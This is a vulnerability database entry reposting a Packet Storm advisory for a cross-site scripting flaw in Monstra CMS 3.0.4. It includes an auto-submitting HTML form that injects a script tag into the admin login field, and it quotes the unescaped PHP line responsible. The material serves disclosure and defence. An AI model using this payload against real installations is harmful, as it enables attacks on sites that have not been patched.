Lucene search
K

Monstra CMS 3.0.4 Cross Site Scripting

🗓️ 13 Nov 2017 00:00:00Reported by M.R.S.L.YType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Monstra CMS 3.0.4 has a Cross Site Scripting vulnerability that allows unauthorized actions.

Code
` ___________________________________________________  
|  
| Exploit Title: Monstra cms Cross Site Scripting(XSS)  
| Exploit Author: Ashiyane Digital security Team  
| Vendor Homepage : http://monstra.org/  
| Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip  
| Version: 3.0.4  
| Date: 2017-11-13  
| Category: Webapps  
| Tested on: Kali-Linux / FireFox  
|__________________________________________________  
|  
| Exploit :  
|  
| <html>  
| <body onload="document.exploit.submit()">  
| <form method="post" action="http://127.0.0.1/monstra-3.0.4/admin/ ">  
| <input type="hidden" name="reset_password_submit" value="hacker" />  
| <input type="hidden" name="answer" value="1" />  
| <input type="hidden" name="login" value="1"/><script>alert(`M.R.S.L.Y`)</script>" />  
| </form>  
| </body>  
| </html>  
|  
|__________________________________________________  
|  
| Vulnerable method :  
| $_POST  
|  
| Vulnerable File:  
| login.template.php  
|  
| Vulnerable code:  
|  
| line 95 :  
| <input name="login" class="form-control" type="text" value="<?php echo $user_login; ?>" />  
|__________________________________________________  
|  
| Discovered By : M.R.S.L.Y  
|__________________________________________________  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation